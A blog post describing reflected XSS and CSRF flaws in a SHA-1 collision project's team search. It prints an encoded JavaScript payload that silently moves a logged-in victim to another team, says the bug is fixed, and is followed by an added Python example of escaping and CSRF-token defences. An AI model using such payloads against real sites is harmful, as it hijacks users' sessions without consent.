Thursday, August 23, 2007

SHA-1 Collision Search Graz XSS and CSRF

A couple of days ago, at , they showed a project for finding SHA-1 collisions.
After I registered, I found out that there was a "competition" between teams to win credits.

So, after checking out how it worked, I found a CSRF and an XSS in the team search engine.

So, I made a simple exploit that will change your team to BOINC Confederation.

The XSS vuln is here:

The CSRF vuln is in all forms.

The exploit (for firefox) is:{open(%22GET%22,%22,false);send(null);x=responseText.match(/id%20value=([0-9]*)/)[1];open(%22POST%22,%22,false);setRequestHeader(%22Content-Type%22,%22application/x-www-form-urlencoded%22);send(%22id=%22%2Bx);open(%22POST%22,%22,false);setRequestHeader(%22Content-Type%22,%22application/x-www-form-urlencoded%22);send(%22teamid=1%22);}%3C/script%3E&search=Search

Pretty simple :P
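The chain above works because the search page echoes the "search" parameter into the HTML unescaped (so injected script runs in the victim's session) and the team-change form accepts any POST that carries the victim's cookies (so that script, or any cross-site page, can submit it). As an added, defender-side example that is not code from the original post or from the BOINC project, the following Python sketch models both fixes: escape reflected input, and require a per-session CSRF token on state-changing forms. The class and function names, the form field names (search, teamid, csrf_token) and the team ids are assumptions made for the example.

```python
import html
import hmac
import secrets

# Constructed, minimal model of the two handlers discussed in the post: a team
# search page that reflects the "search" parameter, and a POST form that changes
# the logged-in user's team. Names and field names are assumptions, not the
# project's own code.


class Session:
    """Per-login server-side state. One random CSRF token per session."""

    def __init__(self, user_id, team_id):
        self.user_id = user_id
        self.team_id = team_id
        self.csrf_token = secrets.token_urlsafe(32)


def render_search_results_vulnerable(query):
    # The reflected-XSS pattern: the search term is copied into the page
    # verbatim, so a query containing "<script>" becomes executable markup.
    return f"<p>Results for: {query}</p>"


def render_search_results(query):
    # Fix: HTML-escape every untrusted value before it reaches the page body.
    # quote=True also escapes " and ', so the value is safe inside attributes.
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def csrf_field(session):
    """Hidden input the server adds to every state-changing form it renders.

    A cross-site page can make the browser send the victim's cookies, but
    cannot read this value out of the victim's page (same-origin policy), so
    it cannot build a POST that passes handle_team_change().
    """
    token = html.escape(session.csrf_token, quote=True)
    return f'<input type="hidden" name="csrf_token" value="{token}">'


def handle_team_change(session, form):
    """POST handler for the team-change form.

    Returns (status, team_id). A missing or wrong token means the request did
    not originate from a form this server rendered for this session, so the
    team is left unchanged.
    """
    submitted = form.get("csrf_token", "")
    # Constant-time compare on bytes: avoids a timing side channel and avoids
    # the TypeError compare_digest raises for non-ASCII str input.
    if not hmac.compare_digest(submitted.encode("utf-8"),
                               session.csrf_token.encode("utf-8")):
        return ("forbidden", session.team_id)
    try:
        new_team = int(form.get("teamid", ""))
    except ValueError:
        return ("bad_request", session.team_id)
    session.team_id = new_team
    return ("ok", session.team_id)


if __name__ == "__main__":
    s = Session(user_id=42, team_id=7)
    payload = "<script>alert(1)</script>"
    print(render_search_results_vulnerable(payload))  # script tag survives
    print(render_search_results(payload))             # script tag is escaped
    print(handle_team_change(s, {"teamid": "1"}))     # ('forbidden', 7)
    print(handle_team_change(s, {"teamid": "1", "csrf_token": s.csrf_token}))  # ('ok', 1)
```

The two checks are independent: escaping the search output stops the in-session script, and the token check stops a forged POST even when some other injection point is found later. The token must be tied to the session (or signed with a server secret) rather than guessable, and it must be compared in constant time.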

So, by "stealing" a user from an important team, you can make your team win. The list of the top users is here:


The bug has been fixed :) It's good to see that someone actually reads my blog xD